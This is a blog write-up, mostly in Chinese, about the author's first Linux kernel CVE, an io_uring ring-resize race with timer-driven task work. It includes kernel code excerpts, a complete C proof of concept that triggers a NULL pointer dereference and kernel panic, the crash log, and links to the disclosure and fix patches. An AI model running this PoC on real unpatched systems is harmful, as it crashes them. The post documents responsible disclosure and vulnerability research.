My First CVE - CVE-2026-23275 - io uring resize and taskrun race condition

Author: 堇姬 Naup (naup96321)

前言

人生的第一個 CVE
https://www.cve.org/CVERecord/?id=CVE-2026-23275

io uring

io_uring 的核心設計目標是減少 I/O 操作所需的 syscall 次數，透過批次處理來提升效能。它維護兩個環形 buffer：

• SQ（Submission Queue）：使用者提交 I/O 請求的佇列
• CQ（Completion Queue）：kernel 完成 I/O 後寫入結果的佇列

基本操作流程如下：

• 設置 io_uring 運作模式
• 填寫 SQE（Submission Queue Entry），每種操作有對應的 opcode
• 通知 io_uring 處理 SQE
• 等待非同步 I/O 完成

通過 syscall call 後

static inline int io_uring_register(int fd, unsigned opcode, const void *arg,
                                   unsigned nr_args) {
    return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}

https://elixir.bootlin.com/linux/v6.19.3/source/io_uring/register.c#L898

switch case 通過 opcode 轉發
https://elixir.bootlin.com/linux/v6.19.3/source/io_uring/register.c#L611

case IORING_REGISTER_RESIZE_RINGS:
	ret = -EINVAL;
	if (!arg || nr_args != 1)
		break;
	ret = io_register_resize_rings(ctx, arg);
	break;

這段簡單來說會去 free 舊的操作，然後去創建新的 cq 跟 sq ring，並初始化 ring metadata

static int io_register_resize_rings(struct io_ring_ctx *ctx, void __user *arg)
{
	struct io_ctx_config config;
	struct io_uring_region_desc rd;
	struct io_ring_ctx_rings o = { }, n = { }, *to_free = NULL;
	unsigned i, tail, old_head;
	struct io_uring_params *p = &config.p;
	struct io_rings_layout *rl = &config.layout;
	int ret;

	memset(&config, 0, sizeof(config));

	/* limited to DEFER_TASKRUN for now */
	if (!(ctx->flags & IORING_SETUP_DEFER_TASKRUN))
		return -EINVAL;
	if (copy_from_user(p, arg, sizeof(*p)))
		return -EFAULT;
	if (p->flags & ~RESIZE_FLAGS)
		return -EINVAL;

	/* properties that are always inherited */
	p->flags |= (ctx->flags & COPY_FLAGS);

	ret = io_prepare_config(&config);
	if (unlikely(ret))
		return ret;

	memset(&rd, 0, sizeof(rd));
	rd.size = PAGE_ALIGN(rl->rings_size);
	if (p->flags & IORING_SETUP_NO_MMAP) {
		rd.user_addr = p->cq_off.user_addr;
		rd.flags |= IORING_MEM_REGION_TYPE_USER;
	}
	ret = io_create_region(ctx, &n.ring_region, &rd, IORING_OFF_CQ_RING);
	if (ret)
		return ret;

	n.rings = io_region_get_ptr(&n.ring_region);

	/*
	 * At this point n.rings is shared with userspace, just like o.rings
	 * is as well. While we don't expect userspace to modify it while
	 * a resize is in progress, and it's most likely that userspace will
	 * shoot itself in the foot if it does, we can't always assume good
	 * intent... Use read/write once helpers from here on to indicate the
	 * shared nature of it.
	 */
	WRITE_ONCE(n.rings->sq_ring_mask, p->sq_entries - 1);
	WRITE_ONCE(n.rings->cq_ring_mask, p->cq_entries - 1);
	WRITE_ONCE(n.rings->sq_ring_entries, p->sq_entries);
	WRITE_ONCE(n.rings->cq_ring_entries, p->cq_entries);

	if (copy_to_user(arg, p, sizeof(*p))) {
		io_register_free_rings(ctx, &n);
		return -EFAULT;
	}

	memset(&rd, 0, sizeof(rd));
	rd.size = PAGE_ALIGN(rl->sq_size);
	if (p->flags & IORING_SETUP_NO_MMAP) {
		rd.user_addr = p->sq_off.user_addr;
		rd.flags |= IORING_MEM_REGION_TYPE_USER;
	}
	ret = io_create_region(ctx, &n.sq_region, &rd, IORING_OFF_SQES);
	if (ret) {
		io_register_free_rings(ctx, &n);
		return ret;
	}
	n.sq_sqes = io_region_get_ptr(&n.sq_region);

	/*
	 * If using SQPOLL, park the thread
	 */
	if (ctx->sq_data) {
		mutex_unlock(&ctx->uring_lock);
		io_sq_thread_park(ctx->sq_data);
		mutex_lock(&ctx->uring_lock);
	}
    

	/*
	 * We'll do the swap. Grab the ctx->mmap_lock, which will exclude
	 * any new mmap's on the ring fd. Clear out existing mappings to prevent
	 * mmap from seeing them, as we'll unmap them. Any attempt to mmap
	 * existing rings beyond this point will fail. Not that it could proceed
	 * at this point anyway, as the io_uring mmap side needs go grab the
	 * ctx->mmap_lock as well. Likewise, hold the completion lock over the
	 * duration of the actual swap.
	 */
	mutex_lock(&ctx->mmap_lock);
	spin_lock(&ctx->completion_lock);
	o.rings = ctx->rings;
	ctx->rings = NULL;
	o.sq_sqes = ctx->sq_sqes;
	ctx->sq_sqes = NULL;

之後去上鎖
mmap 會去上鎖，因為後續會把它 mumap
spin lock completion_lock
並保存 old rings

mutex_lock(&ctx->mmap_lock);
spin_lock(&ctx->completion_lock);
o.rings = ctx->rings;
ctx->rings = NULL;
o.sq_sqes = ctx->sq_sqes;
ctx->sq_sqes = NULL;

這部分會 上 spin lock 來防止對 ctx->rings 訪問
但我沒看到他有想去持鎖，因此導致非法的訪問了 nullptr

hrtimer_interrupt (hard IRQ)
  → __hrtimer_run_queues
    → timerfd_tmrproc           (fs/timerfd.c:74)
      → timerfd_triggered
        → wake_up_locked_poll   (wakes waiters on timerfd)
          → io_poll_wake        (io_uring/poll.c, registered as wait callback)
            → __io_poll_execute
              → __io_req_task_work_add
                → io_req_local_work_add
                  → atomic_or(&ctx->rings->sq_flags)  // NULL deref

建立一個 io_uring，啟用 DEFER_TASKRUN + TASKRUN_FLAG，並提交一個 timerfd POLL_ADD 任務
timerfd 會以 hrtimer 形式周期觸發，打斷 CPU 執行上下文
同時執行 io_register_resize_rings()，在 ctx->rings 被設為 NULL 的那一小段時間內去 access 到 null pointer

race 方法就是:
用戶態不斷呼叫 IORING_REGISTER_RESIZE_RINGS resize SQ/CQ ring 大小
在這個過程中，kernel 會把 ctx->rings 設成 NULL，再分配新的 ring
timerfd 的 hrtimer 定時器會一直觸發
callback 會一路跑到 io_req_local_work_add()
一直 race 就有機會 race 到了

static void io_req_local_work_add(struct io_kiocb *req, unsigned flags)
{
	struct io_ring_ctx *ctx = req->ctx;
	unsigned nr_wait, nr_tw, nr_tw_prev;
	struct llist_node *head;

    ...
	/*
	 * cmpxchg implies a full barrier, which pairs with the barrier
	 * in set_current_state() on the io_cqring_wait() side. It's used
	 * to ensure that either we see updated ->cq_wait_nr, or waiters
	 * going to sleep will observe the work added to the list, which
	 * is similar to the wait/wawke task state sync.
	 */

	if (!head) {
		if (ctx->flags & IORING_SETUP_TASKRUN_FLAG)
			atomic_or(IORING_SQ_TASKRUN, &ctx->rings->sq_flags);
		if (ctx->has_evfd)
			io_eventfd_signal(ctx, false);
	}

	nr_wait = atomic_read(&ctx->cq_wait_nr);
	/* not enough or no one is waiting */
	if (nr_tw < nr_wait)
		return;
	/* the previous add has already woken it up */
	if (nr_tw_prev >= nr_wait)
		return;
	wake_up_state(ctx->submitter_task, TASK_INTERRUPTIBLE);
}

PoC

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/timerfd.h>
#include <stdint.h>
#include <poll.h>
#include <fcntl.h>

#ifndef __NR_io_uring_setup
#define __NR_io_uring_setup     425
#endif
#ifndef __NR_io_uring_enter
#define __NR_io_uring_enter     426
#endif
#ifndef __NR_io_uring_register
#define __NR_io_uring_register  427
#endif

#define IORING_SETUP_CQSIZE         (1U << 3)
#define IORING_SETUP_CLAMP          (1U << 4)
#define IORING_SETUP_TASKRUN_FLAG   (1U << 9)
#define IORING_SETUP_SINGLE_ISSUER  (1U << 12)
#define IORING_SETUP_DEFER_TASKRUN  (1U << 13)
#define IORING_OP_POLL_ADD          6
#define IORING_POLL_ADD_MULTI       (1U << 0)
#define IORING_ENTER_GETEVENTS      (1U << 0)
#define IORING_REGISTER_RESIZE_RINGS 33
#define IORING_OFF_SQ_RING          0ULL
#define IORING_OFF_SQES             0x10000000ULL

struct io_sqring_offsets {
    uint32_t head, tail, ring_mask, ring_entries, flags, dropped, array, resv1;
    uint64_t user_addr;
};

struct io_cqring_offsets {
    uint32_t head, tail, ring_mask, ring_entries, overflow, cqes, flags, resv1;
    uint64_t user_addr;
};

struct io_uring_params {
    uint32_t sq_entries, cq_entries, flags, sq_thread_cpu, sq_thread_idle;
    uint32_t features, wq_fd, resv[3];
    struct io_sqring_offsets sq_off;
    struct io_cqring_offsets cq_off;
};

struct io_uring_sqe {
    uint8_t opcode, flags;
    uint16_t ioprio;
    int32_t fd;
    uint64_t off, addr;
    uint32_t len, poll32_events;
    uint64_t user_data;
    uint16_t buf_index, personality;
    int32_t splice_fd_in;
    uint64_t addr3, __pad2[1];
};


struct io_uring_cqe {
    uint64_t user_data;
    int32_t res;
    uint32_t flags;
};

static int io_uring_setup(unsigned entries, struct io_uring_params *p) {
    return syscall(__NR_io_uring_setup, entries, p);
}

static int io_uring_enter2(int fd, unsigned to_submit, unsigned min_complete,
                           unsigned flags, void *arg, size_t argsz) {
    return syscall(__NR_io_uring_enter, fd, to_submit, min_complete, flags, arg, argsz);
}

static int io_uring_register2(int fd, unsigned opcode, void *arg, unsigned nr_args) {
    return syscall(__NR_io_uring_register, fd, opcode, arg, nr_args);
}

static void *remap_ring(int ring_fd, void *old_ptr, size_t sz, uint64_t offset) {
    if (old_ptr && old_ptr != MAP_FAILED)
        munmap(old_ptr, sz);
    return mmap(NULL, sz, PROT_READ | PROT_WRITE,
                MAP_SHARED | MAP_POPULATE, ring_fd, offset);
}

int main(void) {

    struct io_uring_params params;
    int ring_fd, tfd, ret;
    
    void *sq_ring_ptr = NULL, *sqes_ptr = NULL;

    struct io_uring_sqe *sqes;
    struct io_uring_cqe *cqes;

    uint32_t *sq_head, *sq_tail, *sq_mask, *sq_array;
    uint32_t *cq_head, *cq_tail, *cq_mask;
    size_t sq_ring_sz, sqes_sz;

    setbuf(stdout, NULL); 

    memset(&params, 0, sizeof(params));
    params.sq_entries = 128;
    params.cq_entries = 4096;
    params.flags = IORING_SETUP_DEFER_TASKRUN |
                   IORING_SETUP_SINGLE_ISSUER |
                   IORING_SETUP_TASKRUN_FLAG |
                   IORING_SETUP_CQSIZE;

    ring_fd = io_uring_setup(params.sq_entries, &params);
    if (ring_fd < 0) {
        printf("[!] io_uring_setup failed: %s\n", strerror(errno));
        return 1;
    }
    printf("[+] io_uring created: fd=%d, sq=%u, cq=%u\n",
        ring_fd, params.sq_entries, params.cq_entries);


    sq_ring_sz = params.cq_off.cqes + params.cq_entries * sizeof(struct io_uring_cqe);
    sq_ring_ptr = mmap(NULL, sq_ring_sz, PROT_READ | PROT_WRITE,
                       MAP_SHARED | MAP_POPULATE, ring_fd, IORING_OFF_SQ_RING);
    if (sq_ring_ptr == MAP_FAILED) {
        printf("[!] mmap sq_ring: %s\n", strerror(errno));
        return 1;
    }

    sqes_sz = params.sq_entries * sizeof(struct io_uring_sqe);
    sqes_ptr = mmap(NULL, sqes_sz, PROT_READ | PROT_WRITE,
                MAP_SHARED | MAP_POPULATE, ring_fd, IORING_OFF_SQES);
    if (sqes_ptr == MAP_FAILED) {
        printf("[!] mmap sqes: %s\n", strerror(errno));
        return 1;
    }


    sq_head  = (uint32_t *)(sq_ring_ptr + params.sq_off.head);
    sq_tail  = (uint32_t *)(sq_ring_ptr + params.sq_off.tail);
    sq_mask  = (uint32_t *)(sq_ring_ptr + params.sq_off.ring_mask);
    
    sq_array = (uint32_t *)(sq_ring_ptr + params.sq_off.array);
    cq_head  = (uint32_t *)(sq_ring_ptr + params.cq_off.head);
    cq_tail  = (uint32_t *)(sq_ring_ptr + params.cq_off.tail);
    cq_mask  = (uint32_t *)(sq_ring_ptr + params.cq_off.ring_mask);
    cqes     = (struct io_uring_cqe *)(sq_ring_ptr + params.cq_off.cqes);
    sqes     = (struct io_uring_sqe *)sqes_ptr;

    printf("[+] Rings mapped: sq_ring=%p, sqes=%p\n", sq_ring_ptr, sqes_ptr);


    tfd = timerfd_create(CLOCK_MONOTONIC, TFD_NONBLOCK);
    if (tfd < 0) {
        printf("[!] timerfd_create: %s\n", strerror(errno));
        return 1;
    }

    struct itimerspec its = {
        .it_interval = { .tv_sec = 0, .tv_nsec = 100000 }, 
        .it_value    = { .tv_sec = 0, .tv_nsec = 100000 },
    };

    if (timerfd_settime(tfd, 0, &its, NULL) < 0) {
        printf("[!] timerfd_settime: %s\n", strerror(errno));
        return 1;
    }

    printf("[+] timerfd: fd=%d, interval=100us\n", tfd);

    unsigned idx = __atomic_load_n(sq_tail, __ATOMIC_RELAXED) & *sq_mask;

    memset(&sqes[idx], 0, sizeof(sqes[idx]));
    
    sqes[idx].opcode = IORING_OP_POLL_ADD;
    sqes[idx].fd = tfd;
    sqes[idx].poll32_events = POLLIN;
    sqes[idx].len = IORING_POLL_ADD_MULTI;
    sqes[idx].user_data = 0xdead;
    sq_array[idx] = idx;
    
    __atomic_store_n(sq_tail, __atomic_load_n(sq_tail, __ATOMIC_RELAXED) + 1,
                     __ATOMIC_RELEASE);

    ret = io_uring_enter2(ring_fd, 1, 0, 0, NULL, 0);
    if (ret < 0) {
        printf("[!] submit poll: %s\n", strerror(errno));
        return 1;
    }
    printf("[+] Multishot POLL_ADD submitted\n");

    usleep(5000);

    ret = io_uring_enter2(ring_fd, 0, 1, IORING_ENTER_GETEVENTS, NULL, 0);
    printf("[+] Initial getevents: ret=%d\n", ret);

    int init_cqes = 0;
    while (__atomic_load_n(cq_head, __ATOMIC_ACQUIRE) !=
           __atomic_load_n(cq_tail, __ATOMIC_ACQUIRE)) {
        unsigned ci = __atomic_load_n(cq_head, __ATOMIC_RELAXED) & *cq_mask;
        if (init_cqes == 0)
            printf("[+] First CQE: res=%d, flags=0x%x\n", cqes[ci].res, cqes[ci].flags);
        __atomic_store_n(cq_head, __atomic_load_n(cq_head, __ATOMIC_RELAXED) + 1,
                         __ATOMIC_RELEASE);
        init_cqes++;
    }
    printf("[+] Drained %d initial CQEs\n", init_cqes);

    uint64_t tval = 0;
    read(tfd, &tval, sizeof(tval));
    printf("[+] Timer events cleared: %lu\n", tval);
    printf("[*] Starting race loop...\n");

    struct io_uring_params resize_p;
    int total_cqes = 0;

    for (int iter = 0; iter < 500000; iter++) {

        io_uring_enter2(ring_fd, 0, 0, IORING_ENTER_GETEVENTS, NULL, 0);

        int n = 0;
        while (__atomic_load_n(cq_head, __ATOMIC_ACQUIRE) !=
               __atomic_load_n(cq_tail, __ATOMIC_ACQUIRE)) {
            __atomic_store_n(cq_head,
                __atomic_load_n(cq_head, __ATOMIC_RELAXED) + 1,
                __ATOMIC_RELEASE);
            n++;
        }
        total_cqes += n;

        read(tfd, &tval, sizeof(tval));

        memset(&resize_p, 0, sizeof(resize_p));
        resize_p.sq_entries = params.sq_entries;
        resize_p.cq_entries = params.cq_entries;
        resize_p.flags = IORING_SETUP_CQSIZE | IORING_SETUP_CLAMP;

        ret = io_uring_register2(ring_fd, IORING_REGISTER_RESIZE_RINGS,
                                 &resize_p, 1);

        if (iter < 10000) {
            printf("[D] iter=%d resize=%d (errno=%d) cqes=%d tval=%lu\n",
                   iter, ret, errno, n, tval);
        }

        if (ret == 0) {
            sq_ring_ptr = remap_ring(ring_fd, sq_ring_ptr, sq_ring_sz,
                                     IORING_OFF_SQ_RING);
            sqes_ptr = remap_ring(ring_fd, sqes_ptr, sqes_sz, IORING_OFF_SQES);
            if (sq_ring_ptr == MAP_FAILED || sqes_ptr == MAP_FAILED) {
                printf("[!] re-mmap failed at iter %d\n", iter);
                break;
            }

            sq_head  = (uint32_t *)(sq_ring_ptr + params.sq_off.head);
            sq_tail  = (uint32_t *)(sq_ring_ptr + params.sq_off.tail);
            sq_mask  = (uint32_t *)(sq_ring_ptr + params.sq_off.ring_mask);
            sq_array = (uint32_t *)(sq_ring_ptr + params.sq_off.array);
            cq_head  = (uint32_t *)(sq_ring_ptr + params.cq_off.head);
            cq_tail  = (uint32_t *)(sq_ring_ptr + params.cq_off.tail);
            cq_mask  = (uint32_t *)(sq_ring_ptr + params.cq_off.ring_mask);
            cqes     = (struct io_uring_cqe *)(sq_ring_ptr + params.cq_off.cqes);
            sqes     = (struct io_uring_sqe *)sqes_ptr;
        }

        if (iter % 10000 == 9999)
            printf("[*] iter=%d total_cqes=%d last_resize=%d\n",
                   iter + 1, total_cqes, ret);
    }

    printf("[-] No crash after 500000 iterations\n");

    close(tfd);
    close(ring_fd);

    return 0;
}

crash log

~ $ /tmp/e
[+] io_uring created: fd=3, sq=128, cq=4096
[+] Rings mapped: sq_ring=0x7fc04cf5e000, sqes=0x7fc04cf5c000
[+] timerfd: fd=4, interval=100us
[+] Multishot POLL_ADD submitted
[+] Initial getevents: ret=0
[+] First CQE: res=1, flags=0x2
[+] Drained 1 initial CQEs
[+] Timer events cleared: 18
[*] Starting race loop...
[D] iter=0 resize=0 (errno=11) cqes=1 tval=2
[D] iter=1 resize=0 (errno=11) cqes=1 tval=15
[D] iter=2 resize=0 (errno=11) cqes=1 tval=4
[    7.450656] BUG: kernel NULL pointer dereference, address: 0000000000000024
[    7.451515] #PF: supervisor read access in kernel mode
[    7.451614] #PF: error_code(0x0000) - not-present page
[    7.451766] PGD 8000000001ce4067 P4D 8000000001ce4067 PUD 1c7c067 PMD 0 
[    7.452068] Oops: Oops: 0000 [#1] SMP PTI
[    7.452522] CPU: 0 UID: 1000 PID: 74 Comm: e Not tainted 6.19.6 #1 PREEMPT(voluntary) 
[    7.452690] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[    7.455181] RIP: 0010:__io_req_task_work_add+0x18e/0x1c0
[    7.455731] Code: 02 0f 82 6d ff ff ff 5b be 01 00 00 00 5d 41 5c 41 5d 41 5e 41 5f e9 21 fa b6 ff 41 f7 04 24 00 02 00 00 74 0a 49 8b 44 24 10 <3e> 7
[    7.456075] RSP: 0018:ffffa6a680003e68 EFLAGS: 00000006
[    7.456187] RAX: 0000000000000000 RBX: ffff9167c1cf7000 RCX: ffff9167c1c5da40
[    7.456320] RDX: 0000000000000000 RSI: 000000007fffffff RDI: ffff9167c1cf7000
[    7.456520] RBP: 0000000000000001 R08: ffff9167c1c1ba90 R09: 7fffffffffffffff
[    7.456640] R10: 00000001bc1d3cc0 R11: 0000000000c99769 R12: ffff9167c1c5d800
[    7.456769] R13: ffff9167c1cf7090 R14: 0000000000000001 R15: 0000000000000000
[    7.456907] FS:  0000000037f613c0(0000) GS:ffff91681eeae000(0000) knlGS:0000000000000000
[    7.457005] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    7.457072] CR2: 0000000000000024 CR3: 0000000001d5e000 CR4: 00000000003006f0
[    7.457214] Call Trace:
[    7.457893]  <IRQ>
[    7.458143]  io_poll_wake+0x117/0x200
[    7.458293]  __wake_up_common+0x73/0xa0
[    7.458393]  timerfd_tmrproc+0x43/0x60
[    7.458476]  ? __pfx_timerfd_tmrproc+0x10/0x10
[    7.458555]  __hrtimer_run_queues+0x11f/0x260
[    7.458640]  hrtimer_interrupt+0x103/0x250
[    7.458698]  __sysvec_apic_timer_interrupt+0x50/0x110
[    7.458782]  sysvec_apic_timer_interrupt+0x6a/0x80
[    7.459025]  </IRQ>
[    7.459100]  <TASK>
[    7.459155]  asm_sysvec_apic_timer_interrupt+0x1a/0x20
[    7.459413] RIP: 0010:io_register_resize_rings+0x289/0x560
[    7.459580] Code: c7 43 68 00 00 00 00 8b 84 24 c0 00 00 00 48 89 34 24 4c 89 4c 24 08 8b 7e 04 44 8b 06 89 fa 44 29 c2 39 c2 0f 87 45 02 00 00 <44> 8
[    7.460026] RSP: 0018:ffffa6a680197ce8 EFLAGS: 00000283
[    7.460187] RAX: 0000000000000080 RBX: ffff9167c1c5d800 RCX: ffffcdf8c006fa40
[    7.460382] RDX: 0000000000000000 RSI: ffff9167c1da0000 RDI: 0000000000000001
[    7.460544] RBP: ffffa6a680197d68 R08: 0000000000000001 R09: ffff9167c1d6c000
[    7.460730] R10: ffff9167c1b15cf8 R11: ffffa6a680197c90 R12: 0000000000000000
[    7.460885] R13: 0000000000000000 R14: ffff9167c1c5dd60 R15: ffff9167c1c5dac0
[    7.461153]  ? io_register_resize_rings+0x24e/0x560
[    7.461296]  __do_sys_io_uring_register+0xb2c/0xf80
[    7.461447]  do_syscall_64+0xa4/0x310
[    7.461550]  entry_SYSCALL_64_after_hwframe+0x77/0x7f
[    7.461688] RIP: 0033:0x450cad
[    7.461946] Code: c3 e8 a7 21 00 00 0f 1f 80 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 8
[    7.464371] RSP: 002b:00007fffa5c2bc68 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab
[    7.464543] RAX: ffffffffffffffda RBX: 0000000000000004 RCX: 0000000000450cad
[    7.464618] RDX: 00007fffa5c2bde0 RSI: 0000000000000021 RDI: 0000000000000003
[    7.464685] RBP: 00007fffa5c2bc90 R08: 0000000000000000 R09: 0000000000000000
[    7.464752] R10: 0000000000000001 R11: 0000000000000202 R12: 0000000000000001
[    7.464818] R13: 00007fffa5c2c058 R14: 00000000004c37d0 R15: 0000000000000001
[    7.464896]  </TASK>
[    7.464971] Modules linked in:
[    7.465155] CR2: 0000000000000024
[    7.465475] ---[ end trace 0000000000000000 ]---
[    7.465696] RIP: 0010:__io_req_task_work_add+0x18e/0x1c0
[    7.465769] Code: 02 0f 82 6d ff ff ff 5b be 01 00 00 00 5d 41 5c 41 5d 41 5e 41 5f e9 21 fa b6 ff 41 f7 04 24 00 02 00 00 74 0a 49 8b 44 24 10 <3e> 7
[    7.466137] RSP: 0018:ffffa6a680003e68 EFLAGS: 00000006
[    7.466260] RAX: 0000000000000000 RBX: ffff9167c1cf7000 RCX: ffff9167c1c5da40
[    7.466390] RDX: 0000000000000000 RSI: 000000007fffffff RDI: ffff9167c1cf7000
[    7.466485] RBP: 0000000000000001 R08: ffff9167c1c1ba90 R09: 7fffffffffffffff
[    7.466574] R10: 00000001bc1d3cc0 R11: 0000000000c99769 R12: ffff9167c1c5d800
[    7.466663] R13: ffff9167c1cf7090 R14: 0000000000000001 R15: 0000000000000000
[    7.466752] FS:  0000000037f613c0(0000) GS:ffff91681eeae000(0000) knlGS:0000000000000000
[    7.466856] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[    7.466932] CR2: 0000000000000024 CR3: 0000000001d5e000 CR4: 00000000003006f0
[    7.467268] Kernel panic - not syncing: Fatal exception in interrupt
[    7.468304] Kernel Offset: 0x2d000000 from 0xffffffff81000000 (relocation range: 0xffffffff80000000-0xffffffffbfffffff)

after all

雖然是個影響不大的漏洞也沒辦法做後續 exploit，但還是個值得紀念的人生第一個 CVE
也感謝 @pumpkin @swing 告訴我怎麼回報給官方，linux kernel 回報真的蠻麻煩的，有一些細節要注意，不過 maintainer 回應都蠻快的，基本上 2 周內就會處理完了

最後附上一些 report 紀錄

report

mail:
https://lore.kernel.org/io-uring/959a75c9-4de5-42d1-8f43-636f4aab5df8@kernel.dk/T/#m55e4f0d4b3fa06d42c16e0b24453bbdd7dfe9671
https://lore.kernel.org/io-uring/20260309154438.28376-1-naup96721@gmail.com/
https://lore.kernel.org/io-uring/20260310145521.68268-1-axboe@kernel.dk/T/#rb546bb5196b3dc53e5870c4ce8426e63dfa83db5

stable queue:
https://git.kernel.org/pub/scm/linux/kernel/git/stable/stable-queue.git/diff/queue-6.18/io_uring-ensure-ctx-rings-is-stable-for-task-work-flags-manipulation.patch?id=511c1f4e8933744a6e7475c5defaad673093215b
https://git.kernel.org/pub/scm/linux/kernel/git/stable/stable-queue.git/diff/queue-6.19/io_uring-ensure-ctx-rings-is-stable-for-task-work-flags-manipulation.patch?id=8a41251395b824d1c2ae038b68a0d111c10bc4a2